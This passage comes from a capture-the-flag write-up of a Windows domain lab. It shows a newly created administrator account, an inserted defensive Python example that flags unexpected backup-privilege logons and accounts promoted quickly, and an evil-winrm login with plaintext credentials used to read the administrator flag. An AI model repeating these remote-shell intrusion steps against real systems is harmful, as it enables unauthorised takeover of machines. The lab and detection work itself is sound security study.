Password last set            6/26/2022 1:53:24 PM
Password expires             Never
Password changeable          6/26/2022 1:53:24 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\jmurphy\Documents> 
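Detection logic for the two steps above, as an added example that is neither from the write-up nor from the Backup-ToSystem script: two rules run over constructed Windows Security-log events, one for SeBackupPrivilege/SeRestorePrivilege being granted at logon (event 4672) to an account not expected to hold them, and one for an account being created (4720) and added to a privileged group (4732 local / 4728 global) within a short window. The event records and their simplified field names, the EXPECTED_BACKUP_HOLDERS set and the window length are assumptions.

```python
from datetime import datetime, timedelta

# Constructed Security-log events (not real logs), modelled on the trail the steps above
# would leave. Fields are simplified; the subject of the account creation is assumed to
# be SYSTEM because the payload runs out of a service. Two benign rows are included.
EVENTS = [
    {"time": "2022-06-26T13:49:58", "id": 4672, "subject": "jmurphy",
     "privileges": ["SeBackupPrivilege", "SeRestorePrivilege", "SeShutdownPrivilege"]},
    {"time": "2022-06-26T13:53:24", "id": 4720, "subject": "SYSTEM", "target": "max"},
    {"time": "2022-06-26T13:55:40", "id": 4732, "subject": "SYSTEM", "target": "max",
     "group": "Administrators"},
    {"time": "2022-06-26T09:10:00", "id": 4672, "subject": "svc_backup",
     "privileges": ["SeBackupPrivilege"]},
    {"time": "2022-06-25T08:00:00", "id": 4720, "subject": "hr.admin", "target": "new.starter"},
    {"time": "2022-06-25T08:05:00", "id": 4732, "subject": "hr.admin", "target": "new.starter",
     "group": "Remote Desktop Users"},
]

# Assumptions for this example: who may legitimately hold backup/restore rights, which
# groups count as privileged, and how quickly "create then promote" is suspicious.
EXPECTED_BACKUP_HOLDERS = {"svc_backup"}
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins"}
BACKUP_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}
CREATE_TO_ADMIN_WINDOW = timedelta(minutes=30)


def ts(event):
    return datetime.fromisoformat(event["time"])


def unexpected_backup_logons(events):
    """Subjects granted backup/restore rights at logon (4672) outside the expected set."""
    return sorted({
        e["subject"] for e in events
        if e["id"] == 4672
        and BACKUP_PRIVS & set(e.get("privileges", []))
        and e["subject"] not in EXPECTED_BACKUP_HOLDERS
    })


def fast_tracked_admins(events):
    """Accounts created (4720) and put into a privileged group (4732/4728) within the window.
    Returns (account, group, seconds between creation and promotion)."""
    created = {e["target"]: ts(e) for e in events if e["id"] == 4720}
    hits = []
    for e in sorted(events, key=ts):
        if e["id"] in (4732, 4728) and e.get("group") in PRIVILEGED_GROUPS and e["target"] in created:
            delta = ts(e) - created[e["target"]]
            if timedelta(0) <= delta <= CREATE_TO_ADMIN_WINDOW:
                hits.append((e["target"], e["group"], int(delta.total_seconds())))
    return hits


if __name__ == "__main__":
    print("backup rights outside the expected set:", unexpected_backup_logons(EVENTS))
    print("created-then-promoted accounts:", fast_tracked_admins(EVENTS))
```

The repeated "Waiting for service 'Virtual Disk (vds)' to stop" warnings above are a third signal: System-log 7036 entries showing vds stopping and starting outside a maintenance window, correlated with a 4672 that carries SeBackupPrivilege for a non-backup account, describe this activity well enough to alert on even when the new account is named less obviously than "max".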

Finally, we can log in as our new user and get the administrator flag.

┌──(max㉿1337)-[~/fusioncorp]
└─$ evil-winrm -i fusion.corp -u "max" -p "TestVar123"

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\max\Documents> cd C:\users\Administrator
*Evil-WinRM* PS C:\users\Administrator> dir
cd 

    Directory: C:\users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         3/7/2021   2:04 AM                3D Objects
d-r---         3/7/2021   2:04 AM                Contacts
d-r---         3/7/2021   2:04 AM                Desktop
d-r---         3/7/2021   2:04 AM                Documents
d-r---         3/7/2021   2:04 AM                Downloads
d-r---         3/7/2021   2:04 AM                Favorites
d-r---         3/7/2021   2:04 AM                Links
d-r---         3/7/2021   2:04 AM                Music
d-r---         3/7/2021   2:04 AM                Pictures
d-r---         3/7/2021   2:04 AM                Saved Games
d-r---         3/7/2021   2:04 AM                Searches
d-r---         3/7/2021   2:04 AM                Videos


*Evil-WinRM* PS C:\users\Administrator> cd Desktop
*Evil-WinRM* PS C:\users\Administrator\Desktop> dir


    Directory: C:\users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/3/2021   6:05 AM             37 flag.txt


*Evil-WinRM* PS C:\users\Administrator\Desktop> type flag.txt
THM{redacted}
*Evil-WinRM* PS C:\users\Administrator\Desktop>

And that's finally it. I've got to say I had quite a bit of fun with this machine, but in my opinion it definitely shouldn't be in the hard category.